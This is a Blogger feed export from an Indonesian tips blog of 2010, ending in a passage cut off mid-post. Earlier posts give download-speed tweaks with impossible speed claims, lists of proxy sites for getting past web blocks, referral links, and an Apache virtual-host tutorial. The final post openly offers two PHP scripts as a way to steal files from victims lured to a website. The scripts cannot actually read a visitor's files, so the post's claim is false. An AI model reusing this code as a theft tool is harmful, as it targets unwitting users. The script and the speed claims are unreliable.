HTTP downloads(HTTP_C_BULK) ke mode higher&lt;br /&gt;&lt;br /&gt;pilih lagi bagian Media Streaming&lt;br /&gt;ubah bagian HTTP Steaming clien/..... dan HTTP Streaming server ke mode higher.&lt;br /&gt;&lt;br /&gt;pilih pada bagian Server Protocol&lt;br /&gt;pilih HTTP server ke mode high&lt;br /&gt;      HTTP uploads ke mode high&lt;br /&gt;&lt;br /&gt;klik saveprotokol.&lt;br /&gt;&lt;br /&gt;nikmati deh download dengan 20??? sec sampai 57.??? sec tanpa ada pengaru jumlah download tiap clien, gunakan mode ping, dan refesh, tiap kali download salah satu selesai.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-2045364816548515483?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/2045364816548515483/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/mempercepat-internet-via-cfosspeed.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2045364816548515483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2045364816548515483'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/mempercepat-internet-via-cfosspeed.html' title='mempercepat internet via CfosSpeed'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-2030713254474101824</id><published>2010-06-24T08:42:00.000-07:00</published><updated>2010-06-24T08:51:25.123-07:00</updated><title type='text'>speed download via IDM</title><content type='html'>Disini saya kan memberikan cara meningkatkan Speed IDM via Lan Wifi, nih cara mempercepat download via IDM mampu memberi kecepatan 5%. Sangat lumayan baget bukan jika download dengan kapasitas 10 - 15 mb bisa di tempu waktu selama 10 sec permenit.&lt;br /&gt;&lt;br /&gt;dan kerusakan file download bisa di minimalisirkan:&lt;br /&gt;&lt;br /&gt;buka idm ------&gt; pilih options&lt;br /&gt;        pilih lagi Connection&lt;br /&gt;dan isi Connection type/speed ------&gt;menjadi Other    isi nilai pada bps menjadi 16&lt;br /&gt;dan pada bagian default max. conn number pilih 16&lt;br /&gt;klik oke&lt;br /&gt;dan tutup IDM anda setelah melakukan test kecepatan akan naik 5%.&lt;br /&gt;&lt;br /&gt;udah ya, aku capek nulis terus. yang pasti enjoy bukan download lebih cepet.&lt;br /&gt;&lt;br /&gt;thanks&lt;br /&gt;&lt;br /&gt;by Sharingan&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-2030713254474101824?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/2030713254474101824/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/disini-saya-kan-memberikan-cara.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2030713254474101824'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/2030713254474101824'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/disini-saya-kan-memberikan-cara.html' title='speed download via IDM'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-8988524131728334194</id><published>2010-06-24T08:15:00.000-07:00</published><updated>2010-06-24T08:42:51.245-07:00</updated><title type='text'>Mempercepat internet via ultimet</title><content type='html'>Dari berbagai tutorial banyak sekali sih cara-cara mengingkatkan mulai dari browser hingga download dengan bantuan tool, di sini saya sedikit mengula sedikit saja ya...&lt;br /&gt;program yang anda butuhkan terserah? anda yang pasti mengerti dan bisa cara menggunakannya,.&lt;br /&gt;&lt;br /&gt;Add ons Mozilla Firefox&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426563/FoxyTunes_4.2.1.rar"&gt;FoxyTunes_4.2.1&lt;/a&gt;&lt;br /&gt;Foxylicious&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426555/AutoProxy.rar"&gt;AutoProxy&lt;/a&gt;&lt;br /&gt;user_agent_switcher-0.7.2-fx&lt;br /&gt;Environment Proxy&lt;br /&gt;foxy uRL&lt;br /&gt;QuoteURLText&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426598/meetthespeeddns.rar"&gt;Speed DNS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;ini dari add ons Mozilla firefox yang bisa di instal online atau offline, yang lainnya tool untuk meningkatkan speed download atau speed browser bisa menggunakan tool software,&lt;br /&gt;di antaranya;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426342/CFosSpeed_v4.5.2009_Full.rar"&gt;CfosSpeed&lt;/a&gt;&lt;br /&gt;NetSpeedBooster&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426432/Proxifier.v2.7.rar"&gt;Proxifier&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/downloadlink/10426406/toonel.jar"&gt;toonel&lt;/a&gt;&lt;br /&gt;IDM&lt;br /&gt;&lt;br /&gt;dan masih banyak lagi software-software untuk meningkatkan baik download atau browser saja.&lt;br /&gt;&lt;br /&gt;oke di sini saya kasih cara meningkatkan 5% Browser, yang pertama &lt;a href="http://www.ziddu.com/downloadlink/10426555/AutoProxy.rar"&gt;download Speed DNS&lt;/a&gt;,dan &lt;a href="http://www.ziddu.com/downloadlink/10426555/AutoProxy.rar"&gt;AutoProxy&lt;/a&gt; sorry yang saya gunakan hanya itu aja.&lt;br /&gt;setelah anda download silakan Instal, jika sudah selesai ter instal 2 software tersebut, klik tools pada browser mozilla pilih bagian bawah centang speedUp DNS Lookups.&lt;br /&gt;&lt;br /&gt;Kenapa say suruh anda mencentang speedup DNS lookups: karena di saat anda browser kecepatan dinaikan 2% saja.&lt;br /&gt;cara pertama sudah anda lakukan sekarang meningkatkan mencoba meningkatkan download yang perlu diketahui klik kanan pada tasbar browser mozilla berlogo seperti granat, dan pilih Automatic Mode&lt;br /&gt;jika anda mendownload melalui browser kecepatan naik 3%. Bagaimana kalau pake Idm? kecepatan menjadi normal kembali, untuk bisa mempengaruhi kecepatan download memakai IDM;&lt;br /&gt;&lt;br /&gt;tiga cara trik speed di article 1000trik di jadikan satu dan di kendalikan dengan Browser, semakin anda banyak membuka browser yang aktif memproses apapun itu jenisnya, musik online, TV online selama proses tidak di batalkan kecepatan anda akan naik 2% turus menerus.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;Hasil Uji penulis&lt;/span&gt;:&lt;br /&gt;saya saja download jumlah file 7 dengan kapasitas semua 200 - 400 MB dengan waktu 5-6 semua.&lt;br /&gt;jika cuma satu download dengan kapasitas 200 - 400 MB cuma 30 menit - 3 jam dengan 1-4 MB per sec padahal wifi di tiap 1 pengguna maksimal speed 1-1.2 MB sec dengan waktu 5-10 jam, hingga kapasitas HD saya sekarang habis tinggal 1 GB doang.&lt;br /&gt;pada lagi kalau lagi ngenet pake wifi dengan kondisi sepi bisa nyampai 30 MB per sec.&lt;br /&gt;pada lagi kalau di terapi warnet bisa mencapai 500 - 1 GB per sec, itu cuma download dengan jumlah file 5.(bisa bayangin gimana hasil datanya? ya pasti rusak lah, toh kecepatan melebihi standart mampu merusak file jenis apapun.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;Peringatan&lt;/span&gt;&lt;br /&gt;----------&lt;br /&gt;jika anda sudah menerapkan 4 cara ini tetapi anda belum puas jangan lakukan terus, mampu mempengaruhi prosessor anda, ya kalau sekelas Dell, Apel, tohi(ngak menjanjikan),Mac ngak apa - apa.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-8988524131728334194?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/8988524131728334194/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/mempercepat-internet-via-ultimet.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8988524131728334194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/8988524131728334194'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/mempercepat-internet-via-ultimet.html' title='Mempercepat internet via ultimet'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-5347346534679229526</id><published>2010-06-20T12:44:00.000-07:00</published><updated>2010-07-06T00:14:51.136-07:00</updated><title type='text'>kumpulan web surf</title><content type='html'>apa anda kesulitan membuka website yang terproteksi, dan males memakai program-program yang harus di instal di Headdrive anda, pusing akan hal tersebut;.&lt;br /&gt;&lt;br /&gt;Gunain aja tool web unlock proteksi di sini lumayan, kok bisa nembus berbagai program web yang terkunci, jadi gak perlu ribet-ribet dan memusingkan anda?.....&lt;br /&gt;&lt;br /&gt;Ayo langsung di gunain enak kok dan beken baget gak paket pull ribet abis...&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;!-- var exclude_links = "http://" anonymize_links(); &lt;/script&gt;http://www.cmyip.com/&lt;br /&gt;http://www.indo-code.com&lt;br /&gt;http://anonymizer.nntime.com/&lt;br /&gt;http://www.shadowsurf.com/&lt;br /&gt;http://www.vtunnel.com/&lt;br /&gt;http://htmlblock.co.uk/anonymous_web_browser/&lt;br /&gt;http://anonymouse.org/anonwww.html&lt;br /&gt;http://www.hidemyass.com/&lt;br /&gt;http://proxify.com&lt;br /&gt;http://www.anonymizer.com/index.cgi&lt;br /&gt;http://www.anonymizer.com/index.cgi&lt;br /&gt;http://www.guardster.com/&lt;br /&gt;http://www.guardster.com/&lt;br /&gt;http://anonymouse.ws/anonwww.html&lt;br /&gt;http://anonymouse.ws/anonwww.html&lt;br /&gt;http://www.the-cloak.com/login.html&lt;br /&gt;http://www.the-cloak.com/login.html&lt;br /&gt;https://www.megaproxy.com/freesurf&lt;br /&gt;https://www.megaproxy.com/freesurf&lt;br /&gt;http://www.anonymizer.ru&lt;br /&gt;http://www.anonymizer.ru&lt;br /&gt;https://nadaily.com/cgi-bin/nph-proxyb.cgi&lt;br /&gt;https://nadaily.com/cgi-bin/nph-proxyb.cgi&lt;br /&gt;http://www.userbeam.de/cgi-bin/nph-userbeam.cgi&lt;br /&gt;http://www.userbeam.de/cgi-bin/nph-userbeam.cgi&lt;br /&gt;http://www.free2.surffreedom.com/nph-free.cgi&lt;br /&gt;http://www.free2.surffreedom.com/nph-free.cgi&lt;br /&gt;http://www.linkreducer.com/FUNYLYOO1787&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify; font-family: arial;"&gt;&lt;span style="font-weight: bold;"&gt;NEW&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;http://roxxo.net/&lt;br /&gt;http://www.bypassfirewall.org/&lt;br /&gt;http://www.totalnetprivacy.com/&lt;br /&gt;http://freesurfproxy.org/&lt;br /&gt;http://www.proxeasy.com/&lt;br /&gt;penulis: Sharingan&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-5347346534679229526?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/5347346534679229526/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/kumpulan-web-surf_20.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5347346534679229526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5347346534679229526'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/kumpulan-web-surf_20.html' title='kumpulan web surf'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-6025268786356250845</id><published>2010-06-18T06:06:00.000-07:00</published><updated>2010-06-18T06:25:05.354-07:00</updated><title type='text'>meningkatkan Page rank</title><content type='html'>kesulitan mendapatkan page Rank untuk blog anda, mencari populer blog anda sangatlah mudah, tinggal kunjungi aja web berikut ini:&lt;br /&gt;&lt;a href="http://gayabebas.com/?r=DF12"&gt;GayaBebas&lt;/a&gt;&lt;br /&gt;&lt;a href="http://adsensecamp.com/?ref_id=54947"&gt;AdsenseCamp&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;caranya anda tinggal masuk salah satu dari 2 link group, contoh&lt;br /&gt;masuk ke gayabebas.com&lt;br /&gt;lalu registrasi, dan aktifasinya di email, ingat di gayabebas password anda di buat secara random atau acara, jadi tidak sesuai pilihan anda.&lt;br /&gt;masuk ke webnya lagi sebagai aktivasi lalu anda promosikan situs,blog yang anda miliki, semakin anda rajin  melakukan promosi semakin besar pula Page rank anda, tak hanya itu saja anda tiap kali login dan promosi anda akan mendapatkan uang juga 25 rupiah lumayan bukan.&lt;br /&gt;&lt;br /&gt;contoh analisa&lt;br /&gt;&lt;br /&gt;anda login sebanyak 10 kali dalam 1 hari: 10 x 25 = hitung aja sendiri&lt;br /&gt;promosi anda di klik sebanyak (link) dalam 1 hari: 10 pengunjung x 500 = hitung aja sendirinya&lt;br /&gt;&lt;br /&gt;cuma sampai sini aja cara ningkatkan Page Rank anda tinggal anda sendiri cara menyiasati:&lt;br /&gt;&lt;br /&gt;gunakan 2 link di atas secara bijak dan tidak melakukan hal yang mengecewakan.&lt;br /&gt;sekian terima kasih anda mengunjungi blog saya.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6025268786356250845?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6025268786356250845/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/meningkatkan-page-rank.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6025268786356250845'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6025268786356250845'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/meningkatkan-page-rank.html' title='meningkatkan Page rank'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1630180191146583265</id><published>2010-06-18T05:12:00.000-07:00</published><updated>2010-06-18T05:14:40.910-07:00</updated><title type='text'>Membuat Virtual Host di Apache</title><content type='html'>Apache mempunyai sebuah directive yang bisa dipakai untuk membuat seakan-akan ada banyak web server dengan alamat yang berbeda-beda pada satu server. Nama directive tersebut adalah VirtualHost.&lt;br /&gt;&lt;br /&gt;Kebanyakan web hosting menggunakan cara ini untuk membagi web server ke pelanggan mereka. Jadi, jangan heran kenapa sewa web hosting bisa murah banget. Kalau kita menyewa web hosting sebenarnya kita berbagi server dengan pelanggan yang lain.&lt;br /&gt;&lt;br /&gt;Selama trafik ke website kita belum terlalu tinggi, itu tidak terlalu jadi masalah. Akan tetapi jika trafiknya tiba-tiba melonjak dan terus bertambah, sebaiknya kita menyewa server sendiri. Jika tidak, siap-siap saja diputus kontraknya secara sepihak oleh penyedia web hosting tersebut, karena pelanggan yang lainnya akan menjadi korban.&lt;br /&gt;&lt;br /&gt;Pada tulisan ini saya nggak akan membahas tentang web hosting. Saya akan mengulas bagaimana cara membuat virtual host pada komputer kita sendiri, khususnya dengan sistem operasi Windows. Mungkin ini berguna bagi Anda yang sering mendapat order bikin website.&lt;br /&gt;&lt;br /&gt;Katakanlah pada saat yang bersamaan kita mendapat order membuat website dari tiga perusahaan yang berbeda, misalnya PT Pertama, PT Kedua dan PT Ketiga. Biar kayak server sesungguhnya (yang di-publish di Internet) kita bisa membuat virtual host di komputer kita dengan alamat yang berbeda.&lt;br /&gt;&lt;br /&gt;Trik ini bisa juga dipakai untuk mengakali pelanggan kita, agar saat demo terlihat seolah-olah kita sedang mengakses alamat situs yang sebenarnya (yang terhubung dengan Internet). Padahal kenyataannya yang kita buka adalah virtual host di komputer kita. :-)&lt;br /&gt;&lt;br /&gt;Mau tahu kelanjutannya? Berikut ini cara membuat virtual host di komputer kita:&lt;br /&gt;&lt;br /&gt;   1. Pertama, buat sebuah direktori untuk meletakkan file-file dari virtual host, misalnya saja C:\sites. Pada direktori tersebut nantinya kita akan membuat semua virtual host.&lt;br /&gt;   2. Buka file C:\WINDOWS\system32\drivers\etc\hosts dengan Notepad atau editor teks ASCII lainnya. Lihat baris paling bawah yang berisi seperti ini:&lt;br /&gt;&lt;br /&gt;      127.0.0.1    localhost&lt;br /&gt;&lt;br /&gt;   3. Tambahkan baris dibawahnya nama virtual host yang akan kita buat, misalnya seperti berikut ini:&lt;br /&gt;&lt;br /&gt;      127.0.0.1    www.pt-pertama.com&lt;br /&gt;      127.0.0.1    www.pt-kedua.com&lt;br /&gt;      127.0.0.1    www.pt-ketiga.com&lt;br /&gt;&lt;br /&gt;   4. Jika kita ingin membuat virtual host yang lain, tambahkan dengan cara yang sama. Satu baris untuk satu alamat domain. Jangan lupa untuk menyimpan file tersebut.&lt;br /&gt;   5. Buka file konfigurasi Apache (C:\xampp\apache\conf\httpd.conf) dengan editor teks. Pada contoh ini saya memakai XAMPP. Cari baris seperti di bawah ini:&lt;br /&gt;&lt;br /&gt;      # Virtual hosts&lt;br /&gt;      # Include conf/extra/httpd-vhosts.conf&lt;br /&gt;&lt;br /&gt;   6. Hapus karakter # dari baris kedua, sehingga menjadi seperti berikut ini:&lt;br /&gt;&lt;br /&gt;      # Virtual hosts&lt;br /&gt;      Include conf/extra/httpd-vhosts.conf&lt;br /&gt;&lt;br /&gt;      Selanjutnya simpan file konfigurasi tersebut.&lt;br /&gt;   7. Buka file C:\xampp\apache\conf\extra\httpd-vhosts.conf dengan editor teks. Tambahkan baris-baris berikut ini pada bagian akhir file tersebut.&lt;br /&gt;&lt;br /&gt;      &lt;directory&gt;&lt;br /&gt;         Order Deny,Allow&lt;br /&gt;         Allow from all&lt;br /&gt;      &lt;/directory&gt;&lt;br /&gt;&lt;br /&gt;   8. Buat direktori baru pada direktori C:\sites dengan nama pt-pertama, pt-kedua dan pt-ketiga. Ketiga direktori ini dipakai untuk menyimpan dokumen web dari masing-masing situs.&lt;br /&gt;   9. Tambahkan baris-baris berikut pada file httpd-vhosts.conf.&lt;br /&gt;&lt;br /&gt;      NameVirtualHost *:80&lt;br /&gt;&lt;br /&gt;      &lt;virtualhost&gt;&lt;br /&gt;         DocumentRoot C:\xampp\htdocs&lt;br /&gt;         ServerName localhost&lt;br /&gt;      &lt;/virtualhost&gt;&lt;br /&gt;&lt;br /&gt;      &lt;virtualhost&gt;&lt;br /&gt;         DocumentRoot C:\sites\pt-pertama&lt;br /&gt;         ServerName www.pt-pertama.com&lt;br /&gt;      &lt;/virtualhost&gt;&lt;br /&gt;&lt;br /&gt;      &lt;virtualhost&gt;&lt;br /&gt;         DocumentRoot C:\sites\pt-kedua&lt;br /&gt;         ServerName www.pt-kedua.com&lt;br /&gt;      &lt;/virtualhost&gt;&lt;br /&gt;&lt;br /&gt;      &lt;virtualhost&gt;&lt;br /&gt;         DocumentRoot C:\sites\pt-ketiga&lt;br /&gt;         ServerName www.pt-ketiga.com&lt;br /&gt;      &lt;/virtualhost&gt;&lt;br /&gt;&lt;br /&gt;  10. Simpan httpd-vhosts.conf dan restart Apache.&lt;br /&gt;  11. Buat file indeks.php dan letakkan pada direktori ketiga virtual host tersebut. Misalnya isinya adalah sebagai berikut:&lt;br /&gt;&lt;br /&gt;      &lt;?php&lt;br /&gt;         echo "Ini adalah situs dari PT Pertama";&lt;br /&gt;      ?&gt;&lt;br /&gt;&lt;br /&gt;Nah, sekarang kita mempunyai beberapa domain pada komputer kita yaitu http://localhost, http://www.pt-pertama.com, http://www.pt-kedua.com, dan http://www.pt-ketiga.com.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1630180191146583265?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1630180191146583265/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/membuat-virtual-host-di-apache.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1630180191146583265'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1630180191146583265'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/membuat-virtual-host-di-apache.html' title='Membuat Virtual Host di Apache'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-5523551631486563298</id><published>2010-06-17T08:01:00.000-07:00</published><updated>2010-06-24T04:35:49.867-07:00</updated><title type='text'>kumpulan web surf</title><content type='html'>apa anda kesulitan akan download atau melakukan surf ke web tujuan seperti facebook,4shared,Rapidshare dan lain sebagainya.&lt;br /&gt;akibat pemblokingan tersebut seperti tersarah kurang lengkap jika web tujuan kita terbloking:&lt;br /&gt;Nih gue kasih situs buat yang kelutan akan tersebut.&lt;br /&gt;&lt;br /&gt;http://anonymizer.nntime.com/&lt;br /&gt;http://www.shadowsurf.com/&lt;br /&gt;http://www.vtunnel.com/&lt;br /&gt;http://htmlblock.co.uk/anonymous_web_browser/&lt;br /&gt;http://anonymouse.org/anonwww.html&lt;br /&gt;http://proxify.com]http://proxify.com&lt;br /&gt;http://www.anonymizer.com/index.cgi]http://www.anonymizer.com/index.cgi&lt;br /&gt;http://www.guardster.com/]http://www.guardster.com/&lt;br /&gt;http://anonymouse.ws/anonwww.html]http://anonymouse.ws/anonwww.html&lt;br /&gt;http://www.the-cloak.com/login.html]http://www.the-cloak.com/login.html&lt;br /&gt;https://www.megaproxy.com/freesurf]https://www.megaproxy.com/freesurf&lt;br /&gt;http://www.anonymizer.ru]http://www.anonymizer.ru&lt;br /&gt;https://nadaily.com/cgi-bin/nph-proxyb.cgi]https://nadaily.com/cgi-bin/nph-proxyb.cgi&lt;br /&gt;http://www.userbeam.de/cgi-bin/nph-userbeam.cgi]http://www.userbeam.de/cgi-bin/nph-userbeam.cgi&lt;br /&gt;http://www.free2.surffreedom.com/nph-free.cgi]http://www.free2.surffreedom.com/nph-free.cgi&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;silakan berselancar sepuas anda tapi jangan di gunakan untuk aktifitas kriminal, kasihan pemilik web surf jika di bloking atau keluarkan dari opendns.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-5523551631486563298?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/5523551631486563298/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/06/kumpulan-web-surf.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5523551631486563298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/5523551631486563298'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/06/kumpulan-web-surf.html' title='kumpulan web surf'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-9069804994898910637</id><published>2010-06-16T12:34:00.000-07:00</published><updated>2010-06-16T12:36:04.897-07:00</updated><title type='text'>Bahaya pencurian file pada komputer client menggunakan script PHP</title><content type='html'>Sebelum saya memperjelas isi dari pada judul ini,&lt;br /&gt;saya memohon agar apa yang dipraktekkan disini tidak menjadi suatu hal yang negatif buat orang lain.&lt;br /&gt;Kalaupun anda ingin mempraktekkannya dengan madsud jahat, segala sesuatunya bukan merupakan tanggung jawab saya.&lt;br /&gt;Oke, kembali ke topik. Anda pasti tidak menduga,&lt;br /&gt;bila suatu ketika saya tahu apa rencana dibalik data yang Anda simpan pada komputer anda.&lt;br /&gt;Saya tidak perlu panggil dukun dan begadang seharian untuk menunggu bapak dukun menyelesaikan aksinya,&lt;br /&gt;he..he..he. Tahukah anda ?? dengan script PHP berikut ini, file-file yang ada di komputer client dapat diambil&lt;br /&gt;dengan mudah dan terselip di server Anda.&lt;br /&gt;Cukup dengan menipu korban untuk membuka situs yang sudah disisipi script ini,&lt;br /&gt;maka secara otomatis ia akan mengambil (upload) ke path server tujuan anda.&lt;br /&gt;Berikut Scriptnya :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. File Pertama&lt;br /&gt;&lt;?&lt;br /&gt;// Script ini buat yang ngerti PHP&lt;br /&gt;// Nama File : ScrCuri.php&lt;br /&gt;// Fungsi : Pemproses pengiriman file ke server&lt;br /&gt;$host='localhost';&lt;br /&gt;$port=80;&lt;br /&gt;// Ubah variabel path letak posisi upload.php&lt;br /&gt;$path='/upload.php';&lt;br /&gt;// Ganti variabel fileku dengan file yang ingin kamu ambil&lt;br /&gt;$fileku = "c:\\autoexec.bat";&lt;br /&gt;$content_type = "text/plain"; // type mime file&lt;br /&gt;// Start Header&lt;br /&gt;srand((double)microtime()*1000000);&lt;br /&gt;$boundary = "---------------------------".substr(md5(rand(0,32000)),0,10);&lt;br /&gt;$data = "--$boundary";&lt;br /&gt;$content_file = join("", file($fileku));&lt;br /&gt;$data.="&lt;br /&gt;Content-Disposition: form-data; name=\"fileku\"; filename=\"$fileku\"&lt;br /&gt;Content-Type: $content_type&lt;br /&gt;$content_file&lt;br /&gt;--$boundary";&lt;br /&gt;$data.="--\r\n\r\n";&lt;br /&gt;$msg =&lt;br /&gt;"POST $path HTTP/1.0&lt;br /&gt;Content-Type: multipart/form-data; boundary=$boundary&lt;br /&gt;Content-Length: ".strlen($data)."\r\n\r\n";&lt;br /&gt;// End Header&lt;br /&gt;$result="";&lt;br /&gt;// Buka Koneksi&lt;br /&gt;$f = fsockopen($host, $port);&lt;br /&gt;fputs($f,$msg.$data);&lt;br /&gt;// Dapatkan tanggapan + hasil&lt;br /&gt;while (!feof($f))&lt;br /&gt;{&lt;br /&gt;$result .= fread($f,32000);&lt;br /&gt;}&lt;br /&gt;fclose($f);&lt;br /&gt;// Cetak hasil&lt;br /&gt;echo $result;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;2. File Kedua&lt;br /&gt;&lt;?&lt;br /&gt;// Nama File : upload.php&lt;br /&gt;// Fungsi : Penangkapan isi header atau request yang dikirim dan melakukan proses penyalinan file dari client&lt;br /&gt;&lt;br /&gt;if (is_uploaded_file($fileku))&lt;br /&gt;{&lt;br /&gt;// Ubah variabel namasimpan sesuai path file penyimpanan yang kamu inginkan&lt;br /&gt;$namasimpan="/backup_backup_backup/test/autoexec.bat"&lt;br /&gt;copy($fileku, $namasimpan);&lt;br /&gt;// Tampilkan hasil&lt;br /&gt;echo "Oke";&lt;br /&gt;}else{&lt;br /&gt;echo "Gagal copy file &gt;&gt; '$fileku'.";&lt;br /&gt;}&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nah, setelah kamu menyimpan script kamu pada server/host kamu.&lt;br /&gt;Maka, untuk membuktikannya coba akses script scrcuri.php. Mis :&lt;br 